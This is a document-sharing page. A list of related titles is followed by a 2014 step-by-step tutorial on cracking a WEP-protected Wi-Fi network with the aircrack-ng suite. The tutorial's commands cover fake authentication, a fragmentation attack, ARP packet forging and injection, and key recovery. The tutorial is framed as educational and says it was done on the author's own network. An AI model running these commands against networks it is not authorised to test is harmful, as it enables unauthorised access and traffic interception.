WEP WPA WPS :: INDEX : Introduction :

Similar documents
WEP WPA WPS :: INDEX : Introduction :

MITM Man in the Middle

WiFi Security Assessments

Wireless LAN Pen-Testing. Part I

Kali Linux Cookbook. Willie L. Pritchett David De Smet. Chapter No. 9 "Wireless Attacks"

ALEXANDRE BORGES BLOG

Wireless Network Security. Pat Wilbur Wireless Networks March 30, 2007

WEP Overview 1/2. and encryption mechanisms Now deprecated. Shared key Open key (the client will authenticate always) Shared key authentication

S /3133 Networking Technology, laboratory course A/B

Wireless Encryption Protection

0) What is the wpa handhake?

Methodology: Security plan for wireless networks. By: Stephen Blair Mandeville A. Summary

Vulnerabilities of Wireless Security protocols (WEP and WPA2)

Building secure wireless access point based on certificate authentication and firewall captive portal

Wifi Penetration. Wireless Communication and Computer/Network Forensics


Network Attacks. Common Network Attacks and Exploits

WIRELESS SECURITY TOOLS

SSI. Commons Wireless Protocols WEP and WPA2. Bertil Maria Pires Marques. Dez Dez

WIRELESS SECURITY. Information Security in Systems & Networks Public Development Program. Sanjay Goel University at Albany, SUNY Fall 2006

Offensive Security. Wireless Attacks - WiFu

ECE 4893: Internetwork Security Lab 10: Wireless Security

Security (WEP, WPA\WPA2) 19/05/2009. Giulio Rossetti Unipi

Capture and analysis of wireless traffic

United States Trustee Program s Wireless LAN Security Checklist

Introduction on Low level Network tools

Introduction to WiFi Security. Frank Sweetser WPI Network Operations and Security

Wireless LAN Security Mechanisms

OSBRiDGE 5XLi. Configuration Manual. Firmware 3.10R

An Experimental Study Analysis of Security Attacks at IEEE Wireless Local Area Network

The next generation of knowledge and expertise Wireless Security Basics

Configuring Wireless Security on ProSafe wireless routers (WEP/WPA/Access list)

WPA Migration Mode: WEP is back to haunt you...

Wireless Security: Secure and Public Networks Kory Kirk

CONNECTING THE RASPBERRY PI TO A NETWORK

Overview. Summary of Key Findings. Tech Note PCI Wireless Guideline

Topics in Network Security

PENETRATION TESTING ON A WIRELESS NETWORK.

Analysis of Security and Penetration Tests for Wireless Networks with Backtrack Linux

DV230 Web Based Configuration Troubleshooting Guide

How To Secure A Wireless Network With A Wireless Device (Mb8000)

Developing Network Security Strategies

Penetration Testing Report. Client: xxxxxx Date: 19 th April 2014

Wireless Security Overview. Ann Geyer Partner, Tunitas Group Chair, Mobile Healthcare Alliance

FinIntrusion Kit / Release Notes FINUSB SUITE SPECIFICATIONS. FINFISHER: FinIntrusion Kit 2.2 Release Notes

LOHU 4951L Outdoor Wireless Access Point / Bridge

THE 123 OF WIRELESS SECURITY AT HOME 家 居 WIFI 保 安 123

WLAN Attacks. Wireless LAN Attacks and Protection Tools. (Section 3 contd.) Traffic Analysis. Passive Attacks. War Driving. War Driving contd.

9 Simple steps to secure your Wi-Fi Network.

Wireless Pre-Shared Key Cracking (WPA, WPA2)

Hacking. Aims. Naming, Acronyms, etc. Sources

Kvaser BlackBird Getting Started Guide

Some Tools for Computer Security Incident Response Team (CSIRT)

N600 WiFi USB Adapter

Chapter 3 Safeguarding Your Network

CYBERTRON NETWORK SOLUTIONS

WAP3205 v2. User s Guide. Quick Start Guide. Wireless N300 Access Point. Default Login Details. Version 1.00 Edition 2, 10/2015

Security+ Guide to Network Security Fundamentals, Third Edition. Chapter 6. Wireless Network Security

Chapter 2 Configuring Your Wireless Network and Security Settings

Wireless LAN Security: Securing Your Access Point

Configuring Your Network s Security

Access Point Configuration

Chapter 6 CDMA/802.11i

12/3/08. Security in Wireless LANs and Mobile Networks. Wireless Magnifies Exposure Vulnerability. Mobility Makes it Difficult to Establish Trust

Key Hopping A Security Enhancement Scheme for IEEE WEP Standards

All vulnerabilities that exist in conventional wired networks apply and likely easier Theft, tampering of devices

Authentication in WLAN

Project 3: Network Security

LEARNING COMPUTER SYSTEMS VULNERABILITIES EXPLOITATION THROUGH PENETRATION TEST EXPERIMENTS

Securing your Linksys Wireless Router BEFW11S4 Abstract

Wireless Networks. Welcome to Wireless

White paper. Testing for Wi-Fi Protected Access (WPA) in WLAN Access Points.

Table of Contents. Cisco Wi Fi Protected Access 2 (WPA 2) Configuration Example

Practical Approach in Teaching Wireless LAN Security using Open Source Software

Configure WorkGroup Bridge on the WAP131 Access Point

P r o t o l ck w fi ma a n ger User s Guide

MN-700 Base Station Configuration Guide

Wireless LAN Access Point. IEEE g 54Mbps. User s Manual

Wireless Auditing on a Budget

VIDEO Intypedia012en LESSON 12: WI FI NETWORKS SECURITY. AUTHOR: Raúl Siles. Founder and Security Analyst at Taddong

How To Classify A Dnet Attack

Chapter 2 Wireless Settings and Security

AXIS 207W Network Camera Technical Information

ALL Mbits Powerline WLAN N Access Point. User s Manual

WIRELESS NETWORKING SECURITY

WLAN Information Security Best Practice Document

Security in Wireless Local Area Network

Virtual Access Points

WHITE PAPER. WEP Cloaking for Legacy Encryption Protection

Network Security. Security of Wireless Local Area Networks. Chapter 15. Network Security (WS 2002): 15 Wireless LAN Security 1 Dr.-Ing G.

Transcription:

WEP WPA WPS With clients Without clients :: INDEX : Introduction > Overview > Terms & Definitions [ Step 1 ] : Configuring the network interface [ Step 2 ] : Collecting the network info [ Step 3 ] : Capturing data [ Step 4 ] : Faking Authentication [ Step 5 ] : Sniffing for packets [ Step 6 ] : Forging & Injecting an ARP-Reply package [ Step 7 ] : Decrypting the IVs Introduction : This guide was created to demonstrate the encryption vulnerabilities of WEP (Wired Equivalent Privacy). Breaking into a protected wireless network is illegal! The content and instructions contained herein are for educational purposes, only. I did not break the law when creating this example. All information in the screenshots is that of my own networks that I compromised for this demonstration. You may attempt the steps outlined at your own risk - on your own network. If you wish to hack an other wireless network you must get permission from the network owner. Breaking a WEP key involves using network monitoring software to capture weak IVs (initialization vectors) and a cracking software to decrypt them. The software we will be using in this guide is the aircrack-ng suite that is included with Backtrack linux. There are several flavors of linux that come with this software including Auditor, Backtrack, and Kali linux. In this guide we will be using Backtrack 5 R3. Generally, the idea is to use your wireless adapter to capture any weak IVs being sent to/from the Access Point. We capture these IVs by intercepting and relaying ARP requests to the Access Point causing it to reply with more IVs. Once enough data (IVs) has been collected it can be decrypted using the Aircrack-ng software to display the wep key in plain text. This guide will explain how all of this takes place and outline the steps involved in a successful hack.

[Intro] - Overview : In this scenario we are targetting a WEP encrypted network with open authentication that has no active clients connected. Of the two possible scenarios - this one is the most challenging as some routers may have additional security or unusual configurations that may prevent this method from working (such as MAC address filtering, or if the Access Point is not broadcasting any packets). In this scenario we are making 3 assumptions : (1) You've got Backtrack running properly. (2) The target network is using WEP (open). (3) There are no clients connected to the Access point. The lesson to be learned from this demonstration is that WEP should be avoided whenever possible. Instead you should use WPA-PSK with a strong password consisting of both letters AND numbers. [Intro] - Terms & Definitions : There are a few terms used throughout this guide that are important to know when beginning the processes. Aircrack-ng MAC Address Access Point BSSID ESSID Channel Network Interface Client / Station Capture ARP Request IV A set of tools included with Backtrack. Includes aircrack, airodump, aireplay, airdecap, airolib. A unique combination of letters/numbers assigned as a "permanent" identifier to network hardware. The technical term for the "Router" or "Gateway". Also referred to as a "WAP". The MAC Address of the Access Point. The Broadcast name of the Access Point. The frequency at which data is being broadcast. The device used to send/receive data. Example : wlan0 or mon0. A computer/device connected/associated to an Access point. The process/data that is collected when monitoring an Access point with Airodump. Is a packet sent to/from the router/client in an to establish or maintain a connection. "Initialization Vectors" are packets that contain a small encrypted portion of the wep key. - Throughout this guide the terms Client and Station will be used interchangeably as they refer to the same thing. - The terms Password and Key will also be used interchangeably as they too mean the same thing.

[Step 1] - Configuring the network interface : - When executing commands in the terminal it is necessary to declare which network interface you would like to use. - You can retrieve a list of available interfaces by entering the iwconfig command with no parameters. The Interface names will be listed in the left column. - Your wireless interface will be identified as an "IEEE 802.11" device. possible examples : wlan0, wlan1 or rausb0. - In this scenario we will need to know the MAC address of our network interface to associate with the Access Point. - We can locate the MAC address using the ifconfig command. The MAC address will be listed in the top line. Make note of this MAC address. - To configure our network interface we must set it to "monitor mode" using the iwconfig command. iwconfig mode monitor mode monitor Sets the network interface to monitor mode. iwconfig wlan0 mode monitor

- If you receive an error stating that the device is busy then you will have to turn it off first using the ifconfig command. If so, you will also have to turn the device back on again after setting it to monitor mode. ifconfig down ifconfig up - If you are unable to put your device into monitor mode using the iwconfig command - you can also try using the airmon-ng command. - Using airmon-ng will usually create a new device / interface to monitor traffic with. It's often named mon0. - In most cases iwconfig works just fine and it doesn't create any additional interfaces but airmon-ng will usually work when iwconfig does not. airmon-ng start airmon-ng start wlan0 [Step 2] - Collecting the network info : - To perform the attack we must first gather a bit of information about the network. Everything we need can be collected using the airodump-ng command. - The required information includes: The BSSID (MAC Address of the target Access Point). The ESSID (Name of the Access Point). The Channel that the Access Point is broadcasting on. - After collecting the necessary information - you can terminate the airodump command by pressing Ctrl+C on the keyboard. - As you'll see in the see in the image below - Our selected target is using WEP which is vulnerable to our attack. airodump-ng airodump-ng wlan0

[Step 3] - Capturing data : - Now that we have the required information - we can lock in on the Access Point and start capturing data. - This step also uses the airodump-ng command however we will add some parameters so that it saves traffic to a file. - The first parameter to specify is the channel. This is done with the -c [Channel] parameter. - The next parameter to specify is the output filename. This is done with the -w [Filename] parameter. - Another parameter we will use is the --ivs parameter. This tells airodump only to save the IVs in our capture. - This will display the same output as it did before but will be focused on a specified channel and will also save any traffic to our capture file. - The capture file automatically appends a number to the filename as well as a.ivs extension. mycapture-01.ivs - This command should be kept running in the background while you complete the next steps. Do not terminate it. airodump-ng -c [Channel] -w [Filename] --ivs -c The channel the Access Point is broadcasting on. -w The output filename to write to. --ivs Save IVs to file. airodump-ng -c 11 -w mycapture --ivs wlan0

[Step 4] - Faking Authentication : - To create our ARP request packet we must fake authentication & association to the Access Point. - We will do this using another aireplay-ng (-1) command in a new shell / tab. - Upon submitting the command - the shell should respond with a message stating that the authentication & association was successful. - If it is not successful it could possibly be due to the way the Access Point is configured (example: mac address filtering). aireplay-ng -1 0 -e [ESSID] -a [BSSID] -h [Your MAC] -1 "fake authentication" attack mode. 0 Just once. -e ESSID (name) of target network. -a BSSID (MAC Address) of target network. -h Your MAC Address. aireplay-ng -1 0 -e homenetwork -a 10:9F:A9:F4:F6:81 -h 00:22:75:3C:7E:26 wlan0

[Step 5] - Sniffing for packets : - Now that we are authenticated & associated - we must intercept any packets coming from the Access Point. - In this example we will be using a fragmentation attack (-5) with the aireplay-ng command to create our own ARP packet. We will do this by intercepting a packet from the Access Point and returning it in fragments in an attempt to retreive enough keystream to create our ARP packet. - This command should be started in a new shell / tab as we will need to leave it running. Do not terminate it. - Upon finding a usable packet - your listening aireplay-ng (-5) command will fragment and return the packets to gather keystream from the Access Point. - It will save the keystream as a.xor file and display the file name in your shell. - If you are unable to find any packets - you can try running the another fake authentication attack (-1) to re-associate with the Access Point. aireplay-ng -5 -b [BSSID] -h [Your MAC] -5 "Fragmentation" attack mode. -b BSSID (MAC Address) of target network. -h Your MAC Address. aireplay-ng -5 -b 10:9F:A9:F4:F6:81 -h 00:22:75:3C:7E:26 wlan0

[Step 6] - Forging & Injecting an ARP-Reply Package : - Using the.xor file we saved - we can create an ARP-Reply package and inject it to the network to stimulate the flow of IVs. - This is performed using 2 separate commands. We will use packetforge-ng to create our ARP request packet and aireplay-ng (-2) to inject it. packetforge-ng -0 -a [BSSID] -h [Your MAC] -w [ARP filename] -y [filename.xor] -k 255.255.255.255 -l 255.255.255.255-0 -a BSSID (MAC Address) of target network. -h Your MAC Address. -w Output file name for ARP package. Can be anything. -y Filename of generated.xor file. -k 255.255.255.255 -l 255.255.255.255 packetforge-ng -0 -a 10:9F:A9:F4:F6:81 -h 00:22:75:3C:7E:26 -w arp-request -y fragment-1113-131848.xor -k 255.255.255.255 -l 255.255.255.255 - Upon creating our ARP request packet we can inject it into the network using the aireplay-ng (-2) command : aireplay-ng -2 -r [ARP filename] -2 -r ARP Packet filename created with the packetforge-ng command. aireplay-ng -2 -r arp-request wlan0

[Step 7] - Decrypting the IVs : - After we have collected enough IVs we can begin decrypting the collected data. Usually about 100-200k is good for a 128 Bit wep key. 64 bit will work with much less. - We will crack the key using the aircrack-ng command. - Instead of specifying an exact number in the filename we will use a wildcard * (asterisk) to read all of our captured data. This is useful if you've ran airodump more than once resulting in multiple.ivs files. aircrack-ng -e [ESSID] [Filename] -e ESSID (name) of target network. [Filename] The output file name created with the airodump-ng command. aircrack-ng -e homenetwork mycapture*.ivs - In this example - my computer decrypted the 128-bit WEP key with just 50,000 IVs. - The recovered password / key is : FF7CBB65FFBF6596E5BAD7656A. Copyright 2014 QuickFix PEI

2026 © DocPlayer.net Privacy Policy | Terms of Service | Feedback  | Do Not Sell My Personal Information